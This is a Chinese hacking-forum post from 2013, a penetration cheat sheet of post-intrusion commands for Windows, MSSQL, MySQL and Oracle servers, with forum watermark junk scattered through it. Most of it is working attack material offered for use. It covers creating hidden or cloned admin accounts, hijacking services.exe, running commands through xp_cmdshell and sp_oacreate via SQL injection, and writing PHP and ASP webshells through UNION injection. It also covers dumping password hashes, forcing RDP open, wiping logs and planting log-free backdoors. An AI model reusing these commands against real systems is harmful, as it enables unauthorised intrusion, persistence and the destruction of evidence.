找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4817|回复: 0
打印 上一主题 下一主题

渗透技术大全

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:24:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

! G! w3 p7 z7 m' ]1 I1.net user administrator /passwordreq:no
" u) ^% x$ T, u. R. n, }这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
" ]) w. r/ e- M  @2.比较巧妙的建克隆号的步骤
2 [, s* d; ^) H" w/ }$ o" h: M先建一个user的用户
; {- F) J3 I3 {" q: L$ x: N) A( y( L然后导出注册表。然后在计算机管理里删掉
- r. g) P0 k$ Q& @% i在导入,在添加为管理员组4 L4 Y6 O6 p, @% f' ]# n1 K  ^; ]
3.查radmin密码6 {8 H1 z) A- e4 _
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
/ N- J5 L% \1 c& ^4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
- O& L8 r4 b' ?) B建立一个"services.exe"的项
! C7 t9 M  t( q, G8 T$ Q再在其下面建立(字符串值)7 \) g- C0 d: ]  i. J$ R+ i
键值为mu ma的全路径
% u) E  j- N; l9 |$ L5.runas /user:guest cmd/ q3 D$ ]7 Y. t  }  F
测试用户权限!" M8 g" o, m! y9 W
6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
, C5 b3 r4 r6 N/ C( Z7.入侵后漏洞修补、痕迹清理,后门置放:
4 }1 P- _% L, L3 ?: D: g基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门# {* U  W- ~- q- h; C9 B4 q
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
: q" p: X( B5 L" B& r$ Y! V! d% @" l
for example
# K) q" ~8 p6 e& w/ G  `) P2 j/ F: d' ?5 x8 g/ V6 R8 \; K6 g
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
5 @% |* K' {  `- ~: c) V0 ?$ M: y) [# I3 a! O$ Y- l8 J
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
$ E5 f4 O) y/ X2 ?- d: \  c
, q" \1 m8 b, m9 m' r# W9:MSSQL SERVER 2005默认把xpcmdshell 给ON了+ z$ Q: T; V6 r1 {# h, u- ?
如果要启用的话就必须把他加到高级用户模式
4 u, \6 O0 |- H" i9 W$ I6 x可以直接在注入点那里直接注入6 Q$ C& u0 R" d1 A
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
1 a) y; u; I) e9 g2 P然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
. e( u7 a& p5 {8 s* B, {! h: _2 ?或者
" Y% J0 o: L2 V* |4 C7 \sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
: V3 ?  b7 V: j+ N* I2 m来恢复cmdshell。
5 L0 x( C) ?0 B( G0 k0 Z2 Y8 K- Y+ M" H6 L; q3 d
分析器) q8 p9 @* e1 w' K- |" _; c
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--8 H3 \7 [+ P4 }+ f+ _" l
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
+ T) [& T* p1 L0 x% A( u" [5 F% M10.xp_cmdshell新的恢复办法
! A( G) E; m# a- Cxp_cmdshell新的恢复办法
- p( Q0 E& M% o+ s+ p; T扩展储存过程被删除以后可以有很简单的办法恢复:5 y. ?' S! k% F) }, {7 c3 f
删除4 G' e+ Y* m) G7 x+ M  O0 f
drop procedure sp_addextendedproc
4 }3 k) V- s) _0 O3 R, Zdrop procedure sp_oacreate6 x: T# q8 u" q2 R  P
exec sp_dropextendedproc 'xp_cmdshell'
; L2 ?" d6 v# H3 |' D7 d- M4 u# k: E) Z0 `- j, {% |
恢复1 X2 G% V. p3 a  X; J' G
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
2 Y( L' r/ F! P+ s3 V6 A" Bdbcc addextendedproc ("xp_cmdshell","xplog70.dll")
4 a( a' {: K! T+ r) a& K3 o7 I! q8 z' c  g1 G+ D
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
4 y: b6 E0 m" F) L& L0 p, y1 k/ Z2 I  O' O" N1 n- U" C  R; d
-----------------------------1 p* r) K6 ]! A+ c. [/ _
$ M8 o3 b' ]8 b- I) {! y6 @
删除扩展存储过过程xp_cmdshell的语句:
9 d8 `9 h5 _. @7 W* C, {exec sp_dropextendedproc 'xp_cmdshell'' \2 v& v- \' C. w" ~4 N, P

% M) e4 q/ k) a: T; c' k2 ^恢复cmdshell的sql语句
0 {+ U- W9 I6 T9 v$ t* m8 W$ }exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
. w' ]/ J; a& z3 w6 ]) u0 e
+ ]1 A( C! L- {5 ]  D" D+ _; t2 y1 \2 n% ?9 z
开启cmdshell的sql语句3 D7 z0 `$ T3 A$ J; G

# p  z; m5 |* ?) ?& x) T7 fexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'$ [& {8 U  ~" [+ G. \
" j. F/ }. F, P1 n: H* s1 A- N
判断存储扩展是否存在8 C2 F$ K7 p! @- _5 \
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'/ p  ^8 T& V8 y$ P1 M; s
返回结果为1就ok# B! Z0 m8 U1 X
& y# S% q  Y; E! k. f7 P
恢复xp_cmdshell8 q  P. `- I9 c4 ?- ?
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'2 Y% Y( X8 j8 s' n
返回结果为1就ok8 W# p, l- Z9 |- S0 [
2 Q9 W5 j+ A7 y+ d) V1 ]& L0 s- W8 E
否则上传xplog7.0.dll' B8 \5 j+ M1 Q! \( ?1 ~* \5 y% t
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'/ f) E+ `$ ~$ K' K; p! v

3 X5 x; C: k: j9 U8 g; u! N堵上cmdshell的sql语句
) F! j; ^& E8 F1 M% q/ s, F5 gsp_dropextendedproc "xp_cmdshel
2 p! z) t  f3 v6 f! r2 C' k-------------------------
* \  {  O5 G" N) G+ i清除3389的登录记录用一条系统自带的命令:
: H& T  o/ m8 h4 ~reg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f. Q9 j2 J4 d. ]8 N, r+ Q; M& p

0 z4 V+ i' m. d* B. A然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件8 u! C  \* h- L
在 mysql里查看当前用户的权限
( N* g. u1 n* |( Jshow grants for  
; Y0 G. u1 c$ |; c* ?2 q! f. p1 h! k6 {$ g
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。' y* Y% G1 Q, F6 e) T

3 V' B( W$ E! v% K/ f. L! p8 U6 P. K2 z0 P
Create USER 'itpro'@'%' IDENTIFIED BY '123';  t3 N! Z' `; E9 |5 C: X5 @
' z1 d' C! m$ q7 ]
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
# A, V+ d: k7 i. a& h. p2 B3 a) V' b4 B+ v  }; z
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
: W8 t6 j8 I) A9 ^! C6 A0 c
' @3 Y! F2 n7 a8 V2 C, l& g' B' N: ^& PMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;: a- B% `! p4 g& y7 R& C
* z* J" Q0 L/ x( N+ }
搞完事记得删除脚印哟。
1 [9 n1 l4 w3 \: o, a
( H  y9 D& y: P2 kDrop USER 'itpro'@'%';
/ c6 x+ U: z7 D7 u3 q2 @, J. D# `, p2 o
Drop DATABASE IF EXISTS `itpro` ;2 ^& ~3 `: C$ l" k( ^
, ?1 P! U9 g+ i, M, j% ~" |
当前用户获取system权限& U& w+ D) R) R; ~' i+ S
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
0 I4 m+ {! y$ W# Z" y, p; [3 nsc start SuperCMD
/ S( U' x+ l; v* a/ b  E8 G程序代码! C4 w- t; v( N1 q, c" V
<SCRIPT LANGUAGE="VBScript">
5 Y) L9 M0 \  g9 X! [4 Rset wsnetwork=CreateObject("WSCRIPT.NETWORK")$ P: J/ [" Z/ B5 [
os="WinNT://"&wsnetwork.ComputerName! _6 }$ B& }0 C' _
Set ob=GetObject(os)
7 l9 S$ A4 Y* N5 h3 |  s# Q6 z7 j% BSet oe=GetObject(os&"/Administrators,group")
# y  \  z) k1 L) bSet od=ob.Create("user","nosec")
% ~" p1 @5 s! @, V1 @od.SetPassword "123456abc!@#"4 o& t: h1 U+ y  k) U+ b
od.SetInfo3 Q# ^9 F4 V1 |: n
Set of=GetObject(os&"/nosec",user)6 Z3 T, A% V3 u! ?5 a
oe.add os&"/nosec"
/ E* L; P8 W2 W  [</Script>
, N4 r. Q4 S: T9 S0 X<script language=javascript>window.close();</script>/ O! s. {# I% w1 E& V

+ D5 x2 s: H6 H2 ^' b) W1 w1 k; I
0 C& d* C5 @) Q; {6 I; i8 M; L6 k1 J% c7 u

/ a, Q4 _; C) V突破验证码限制入后台拿shell7 n1 K5 a( ]8 E
程序代码
( Q+ {& k! m: y5 |REGEDIT4 ) `4 V- J. S( D0 g: E$ @# `
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 9 F4 q+ ]8 }; }1 H% [
"BlockXBM"=dword:00000000  E1 _3 H5 K) s6 z! D1 \! A
) I: e6 Z$ S' H5 {$ K
保存为code.reg,导入注册表,重器IE
3 w1 L1 g( s% `) b1 R1 o就可以了$ P, g5 E) j* P. F" s, @
union写马
2 X; `7 F* f0 }8 Y( A$ B3 o$ C程序代码! r- I  L  P0 j( @+ N+ }
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
, r/ \2 A6 [# v2 w; q
2 b; h0 f8 _. x应用在dedecms注射漏洞上,无后台写马* t7 Q' t! J' z
dedecms后台,无文件管理器,没有outfile权限的时候  j3 d- X& B' V/ j, A! h
在插件管理-病毒扫描里3 b4 T7 F1 u' i) N9 I0 K/ N% L; n$ s
写一句话进include/config_hand.php里* \+ E/ r4 `7 s  J( q/ a
程序代码/ j) V, t8 v0 x4 ?6 t
>';?><?php @eval($_POST[cmd]);?>
6 N: m+ e( y% o) h0 F8 Q/ G. M+ V. t/ f+ B4 J  d

  a9 [. a: r* Z' X) w0 b如上格式
/ ]( C8 ?8 Z3 h6 v
4 I( H. F/ P1 F$ k3 Roracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解' S4 |( n: j8 ^
程序代码
$ f/ s( j# M; V3 eselect username,password from dba_users;5 V* j* C' m  u3 }: R3 v% g, s

; O! q4 O/ i4 k2 |
1 N1 O& m) P( F" qmysql远程连接用户
1 {/ F/ Z" o5 \; _( v  M  X7 Q程序代码
! x- q3 E8 e& y3 t. |1 C  z: e! {# M- L# g( R' O1 D8 m
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';% o/ [% b4 A" O! Z: z3 D
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
1 w5 P0 U+ ]; _; X% K, \1 DMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0# |9 x' U6 }9 G9 e! W  H
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
5 W: N; Z2 f! b( B' N
' A5 T) c' S) H$ {4 G& ^" W& b/ t' ^6 X8 d& [
) I% l2 @- ^; @: {, i: }

/ b" l4 t4 q+ F! a; Kecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
5 \- a) i8 }* d" b' R, f% C' z3 s
1.查询终端端口( ]2 M* \! K  l

0 [" V( @; ?4 H2 a# K) wxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
5 Q* ^* H4 S/ C3 y/ B+ v& a/ ~
7 V5 c+ ~7 ~, b* j( f4 m8 {通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
4 N! P4 m, q0 b! Ltype tsp.reg2 \) Z  o) D( p6 f4 L
" u5 `1 d+ h# A( u; R  s
2.开启XP&2003终端服务
( b# j$ @1 d) ~2 e) m* `1 V( g* Z* `1 ]8 k. H

# t  I0 N5 Q9 T$ H6 T3 h3 o3 BREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
3 e: ^; q6 e$ K- I! J$ s8 l
! d! y' O7 ?+ {7 S# c! Q" ]4 `$ j7 ^4 v
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
( |' f' O) k4 B6 m0 K$ ?4 j" M" D0 L  S9 F  i% _* @
3.更改终端端口为20008(0x4E28)
! \! g. l; m5 m4 x  t( i) G2 x+ H/ v( S# D
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f7 A  n! b* f2 Z. t1 ~$ o6 j

! _) z0 {9 Z2 B' oREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f) ]7 R# @" P6 G! I' ?
, N8 k# o' e; ?6 B& X+ l' e! K$ Y
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
/ J* `* C( I  D9 K+ a1 r0 E) P7 K5 m; x* o3 `, \( L6 C
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
2 ?8 c$ Y' D$ c2 z* ~
9 e7 D* j, i$ x6 R$ Z  B7 K: y( [8 e, |0 Z5 [+ P' L3 Y
5.开启Win2000的终端,端口为3389(需重启)' u& m9 z4 {( l- O# `$ T; I
; T# G1 ~+ b$ H7 ~2 |0 S; I
echo Windows Registry Editor Version 5.00 >2000.reg 5 k7 f+ C- [0 I/ S0 {0 p
echo. >>2000.reg6 c! Q! i8 G& z6 p' O3 s* P
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
4 v6 D4 J1 W" W1 v! B6 o! B% Techo "Enabled"="0" >>2000.reg
! V9 G% ^1 e# C8 b, i' A3 {echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
+ W; s: y2 h- h) {) F; F1 Secho "ShutdownWithoutLogon"="0" >>2000.reg # p* D( `/ t' c& K( X) W( d% ~
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg   K  {- _7 n7 W
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
6 b9 T; i# D8 A6 eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg ' J) U# B( ]  j, `3 F! \
echo "TSEnabled"=dword:00000001 >>2000.reg 4 i+ A; N* i4 E2 m
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
/ b0 G# l0 R) Q0 ~/ Techo "Start"=dword:00000002 >>2000.reg
% t2 n& J* o- b' T9 necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg # _, n5 f% e9 V& r% \
echo "Start"=dword:00000002 >>2000.reg
9 @( ?. D, b0 p3 T/ cecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 3 G0 X! Z! U4 ~4 x& Y* s
echo "Hotkey"="1" >>2000.reg
2 T3 S3 r0 B" Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
/ S3 `  _( C. \. G* _* H# I; Xecho "ortNumber"=dword:00000D3D >>2000.reg + p/ I& w- p( b$ r- g% F7 P
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
. @/ z: j' e' I& h* Wecho "ortNumber"=dword:00000D3D >>2000.reg
! J, u! `/ b# p4 Z/ F( P' N/ }9 V
2 w5 m, J! B, l6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)6 X! Z) O* m  {$ Z  `; r

, t/ N" V6 e! U. u, X) e$ @@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
  w4 D  L4 j$ T0 [1 y(set inf=InstallHinfSection DefaultInstall)
5 G( f: Z# B, e+ T+ x8 g3 \" Gecho signature=$chicago$ >> restart.inf
( P/ k4 U$ s/ X4 `. j* F+ q8 secho [defaultinstall] >> restart.inf
6 h8 j  X" w8 T/ o" z- wrundll32 setupapi,%inf% 1 %temp%\restart.inf
; t9 u' y  U# b5 V
% j9 W( V! q; {
3 M$ ~+ B  S5 s) H  A7.禁用TCP/IP端口筛选 (需重启)
8 E' R" e- B( E- M: a& `+ _, d8 N! W' E( v* u
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f0 R( g: |8 r/ j5 T

" N0 z1 h; h2 {! ]  ]8.终端超出最大连接数时可用下面的命令来连接
& s* X: g4 `' O( G+ t5 t# S* M" `6 G7 E8 w( @% I* o* M: @& d3 Z, Q
mstsc /v:ip:3389 /console
% N  M6 z6 r. l9 Z" H! m7 B( V7 q3 v
; G% p+ H/ s3 [- {2 K" S9.调整NTFS分区权限0 T) H5 m( R# \3 u1 h" L2 q: a

+ Z) o8 c0 M5 w1 _, ncacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
/ h' {2 L' V1 y% k- t. t5 H& h1 C: M- ]3 C' y8 v+ e
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
( Y+ \: z+ X1 T* |  d
- e* b! o# G, H9 Q------------------------------------------------------
6 B  \: ^: W( x) J5 z3389.vbs 3 m2 z7 T( u* q5 X* s0 W( U
On Error Resume Next) ]# F+ Y  [8 t# w9 s
const HKEY_LOCAL_MACHINE = &H80000002( [+ t3 v* I. E/ H: z
strComputer = "."
4 h6 u, w- I) C6 O1 RSet StdOut = WScript.StdOut
* ~# G0 ~8 G5 ^1 A0 |1 c( X. LSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
# g) A4 g  I7 xstrComputer & "\root\default:StdRegProv")
" }, n# c/ i" h/ V0 UstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
) I5 B' R9 d5 H+ D' s' uoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath. _! [& J# C! E" m9 |4 M
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"* b5 h9 f; r% b1 O1 n
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
3 X7 s1 l* `9 I, e; DstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"& |- k2 K& u1 F2 d% m$ o( i
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"% l+ l7 \# Z1 ~5 y9 ?
strValueName = "fDenyTSConnections"
% h0 B1 W  I* x* `4 b& XdwValue = 0
! E9 M! }, g5 i7 z( l" Horeg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue7 r  m6 ?5 }% a+ w1 L& B. `
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
! k# e8 q6 B& J2 ^- WstrValueName = "ortNumber"7 X$ E0 z, z+ |# p6 }
dwValue = 3389
5 j! ?6 L9 }' c  Doreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
  {8 Z  i* r0 z/ ?strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"7 e2 g, a- H5 k
strValueName = "ortNumber"$ y' e1 C! @! C# `- {
dwValue = 3389
/ ]+ A5 H1 {% E7 E7 P8 moreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
- V/ W  h! S' |9 d7 gSet R = CreateObject("WScript.Shell") % a  y" v* k: }( j! f; L& g2 I  f
R.run("Shutdown.exe -f -r -t 0") + G" r  x7 X$ d' Y- g9 e; Z
/ i7 c$ R8 O* G0 p" H  p
删除awgina.dll的注册表键值, G, A  k  A+ K  C. f
程序代码
0 y0 L" p1 i) d% d
5 F0 [: D* ~4 dreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f- E# D! j3 e/ t! G1 I5 y1 n

* i: i# ~( D4 N$ o
- Y6 P" v# W* a+ _
  |  p& L& x/ i- f
$ W; L7 k' C$ K8 S程序代码3 r; z. `5 F8 q6 d
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash( t1 q" h  Q; A+ b

. w& g, [! d# N设置为1,关闭LM Hash
3 n1 W( ]9 l3 k8 U3 f0 q( m. U2 `4 K* {5 ?
数据库安全:入侵Oracle数据库常用操作命令
5 n/ K( j# }5 Y  h) R最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。& B3 z- _2 `- @
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
8 H. K, M  R" X1 ]2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
4 ]2 N" l4 F" ]/ ?3、SQL>connect / as sysdba ;(as sysoper)或  W' I" y% `. l: u) i
connect internal/oracle AS SYSDBA ;(scott/tiger)2 P1 ?2 O3 k( I
conn sys/change_on_install as sysdba;
  ]& N: B! q, o6 O. [! [4、SQL>startup; 启动数据库实例
/ X8 X- w3 O* X% x5、查看当前的所有数据库: select * from v$database;& X" L6 l! i. {
select name from v$database;
8 g" @9 j1 C7 }6、desc v$databases; 查看数据库结构字段
( I4 V. p$ \0 d7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
( L4 \9 o2 r# r4 S! S  w7 BSQL>select * from V_$PWFILE_USERS;: d, H9 c* {% r; K1 @
Show user;查看当前数据库连接用户
+ ^' n; G# E, @5 }2 i) O8、进入test数据库:database test;
8 l$ f" ?) ^, h! N) B4 G" ~9、查看所有的数据库实例:select * from v$instance;; l' g8 G# I# i
如:ora9i
) p# ^8 d: A( v3 c10、查看当前库的所有数据表:$ F$ {; \, ~* g. N3 h7 Z/ D3 [- r
SQL> select TABLE_NAME from all_tables;
8 g# @+ ?7 P, x6 dselect * from all_tables;
* {. A* h: i0 }& g/ b% Q+ d( ?SQL> select table_name from all_tables where table_name like '%u%';
6 v3 C( E6 ]+ F7 |8 xTABLE_NAME; i" J' ]4 K. S
------------------------------
6 }) l, c) U# R( `_default_auditing_options_6 o# e0 b- o( }* Y' E
11、查看表结构:desc all_tables;
' x" b' o! V, ^7 O/ U12、显示CQI.T_BBS_XUSER的所有字段结构:
% B  p7 ]" S& s4 _5 J1 vdesc CQI.T_BBS_XUSER;
9 r8 t) ~7 P! y; E4 h7 J; Y13、获得CQI.T_BBS_XUSER表中的记录:) m0 t  q. w. o, q! v8 u  ~2 y
select * from CQI.T_BBS_XUSER;8 V0 Y, z5 z. k; ]
14、增加数据库用户:(test11/test)
8 h; {* }* U' i2 }/ Acreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;& Z; g; d. a& V5 a+ b! n
15、用户授权:
4 D% [! P2 p) i# a& {! q/ hgrant connect,resource,dba to test11;
: J2 |* S- W9 f6 u* W/ }* ?grant sysdba to test11;
! J' x/ i$ }8 \commit;
. X" H/ Y+ P( T( E16、更改数据库用户的密码:(将sys与system的密码改为test.)! M; r' ~! I- {2 q
alter user sys indentified by test;) E  _7 W0 P+ E/ j2 l: F
alter user system indentified by test;: I5 j2 R- w7 h

' w! H  v! W5 a; V! O% TapplicationContext-util.xml9 {2 @- k  a3 d: G& A1 [
applicationContext.xml2 |8 J; K* z8 W3 X& Y
struts-config.xml
# I$ P) i  ?1 `* k5 f) `web.xml
: K  R, O& g/ V' `, [3 c- Q# Userver.xml
. g( u. v8 o, E  J% H. utomcat-users.xml7 |  ^& H6 N: t% I$ G' P0 p
hibernate.cfg.xml
. S, B2 v) n" S, X/ udatabase_pool_config.xml
0 X  w( \# B' ~
( {2 X" E4 l9 E1 k- R" _$ Z& z2 N; ?8 Z+ A9 x% {' q
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置' |! A7 g0 u  h& b/ p
\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini5 u& ]0 y% n! q
\WEB-INF\struts-config.xml  文件目录结构
+ T" U/ }1 u) g: x6 y- h+ {, `) P5 O1 i* Z! d- o$ k
spring.properties 里边包含hibernate.cfg.xml的名称
3 N1 @* c, h3 L: C$ U' d0 l$ o* C; C6 p/ m9 q. z  r% N/ Y% B

2 L" x8 A9 X. ]6 YC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml2 i$ h5 a0 D& C# @5 J

! S( @. b8 E/ S: o如果都找不到  那就看看class文件吧。。- p& ]1 ~, a7 T" w6 S! o" O/ O

: D7 F1 L; i8 q+ H测试1:
1 _! P  H+ n6 A0 C: W3 @SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1& m  A: X. e- \: n' c6 m# j

7 F# i' ^6 x0 e3 r6 n+ x2 \* @  d9 x测试2:- v2 G' t9 P) A

% ]/ ?8 x3 t  C6 K0 gcreate table dirs(paths varchar(100),paths1 varchar(100), id int)' l  V+ e# k( W: J# O

. E) l8 X/ g. s& `8 S$ v" H% S# Udelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--3 ^, l/ f8 a8 {9 |
: |5 T" A1 f* x2 L6 E" h2 e
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
4 Q: ~/ T; A4 W1 g. @) _2 F! i: b7 J5 F
查看虚拟机中的共享文件:
# l! J1 a  p+ @. Q7 A, Z6 V在虚拟机中的cmd中执行
( u$ ^9 Q; ~: `* x: v\\.host\Shared Folders
" b4 H9 G# ^% B) V4 [
, |& X- X* g* G2 M+ Bcmdshell下找终端的技巧5 T: ~( Y1 C  l" T9 L  f1 W5 E5 U
找终端: * ]# y2 I. b- E6 Z+ e
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! ) [0 Y# i3 R1 `& ^9 a) h, M  c
   而终端所对应的服务名为:TermService - r5 `/ Z) s) B6 l, W
第二步:用netstat -ano命令,列出所有端口对应的PID值!
" b: X# N8 B* I2 r7 x) [   找到PID值所对应的端口: x+ Z6 Q3 ^4 \3 h. f
0 Q8 K, j! ?+ ~8 C! [: w
查询sql server 2005中的密码hash
" |5 _5 ?: I. A* Y' B7 c0 l5 ESELECT password_hash FROM sys.sql_logins where name='sa'
& p5 j# [) Z( T3 s% R3 [, HSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
1 N; |: v% P+ }* P# x/ Jaccess中导出shell
4 l+ g* e: L5 A7 G7 Q
